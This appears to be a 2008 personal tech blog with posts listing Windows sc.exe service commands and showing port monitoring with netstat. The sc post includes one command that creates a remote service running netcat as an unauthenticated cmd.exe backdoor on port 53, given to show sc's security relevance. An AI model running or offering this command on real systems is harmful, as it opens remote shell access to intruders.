Saturday, 29 March 2008

Sincerity

Sincerity: Use no hurtful deceit; think innocently and justly, and, if you speak, speak accordingly.

My tracking goal for the week.

Thursday, 27 March 2008

sc on windows SERVICE

"sc.exe" or Service Control allows the Creation, Starting, Stopping, Querying or Deletion of any Windows Service. The command options for SC are case sensitive.

For details on How to create services using sc, see: http://support.microsoft.com/default.aspx/kb/251192

The "sc" commands are:

  • query [qryOpt] Show status
  • queryEx [qryOpt] Show extended info - pid, flags
  • GetDisplayName Show the DisplayName
  • GetKeyName Show the ServiceKeyName
  • EnumDepend Show Dependencies
  • qc Show config - dependencies, full path etc
  • start START a service.
  • stop STOP a service
  • pause PAUSE a service.
  • continue CONTINUE a service.
  • create Create a service. (add thie service to the registry)
  • config permanently change the service configuration
  • delete Delete a service (from the registry)
  • control Send a control to a service
  • interrogate Send an INTERROGATE control request to a service
  • Qdescription Query the description of a service
  • description Change the description of a service
  • Qfailure Query the actions taken by a service upon failure
  • failure Change the actions taken by a service upon failure
  • sdShow Display a service's security descriptor using SDDL
  • SdSet Sets a service's security descriptor using SDDL
Now the question is how does this relate to security? For an answer, think of the command:

C:\> sc.exe \\[Hostname] create nc_service binpath="c:\temp\nc.exe –l –p 53 –e cmd.exe"

A simple backdoor listening on an unsued port without authentication may be created with just a simple command. So hence the link to security.

Some related Windows commands are:
DELSRV - Delete NT service
INSTSRV - Install an NT service (run under a specific account)
NET - manage network resources
NETSVC - Command-line Service Controller (Win 2K ResKit)
PsService - View and control services
CLIST - Display NT Services
START/HIGH - Start a specified program or command.
Svcmon - Monitor services and raise an alert if they stop. (Win 2K ResKit)
Svcacls - Service ACL Editor (Win 2K ResKit)
SUBINACL - Set service permissions
WMIC SERVICE - WMI access to services

Wednesday, 26 March 2008

Monitoring ports in Windows

With a simple command and a little scripting, it is possible to make a simple network monitoring service in windows. The command:

  • C:\> netstat –noa 5 find "6666"

Will “look” for both TCP and UDP port 6666 on the system. It will further monitor this by checking every 5 seconds.

This netstat command is used to list (in numerical form, the -n), all TCP and UDP ports (-a) in use and the process ID number using each port (-o).

This is set to run every five seconds in our command (5. A space is required between the “–noa” and the “5”).

The output of the netstat command is piped to find to display only the string 6666, which would indicate that either TCP or UDP port 6666 is in use.

Add a simple script to diff the results and there you have a simple script to check ports. You could even have it display changes using "diff".

Next, we need to look at using "sc" to make this occur each time the system starts.

Tomorrow, sc on windows.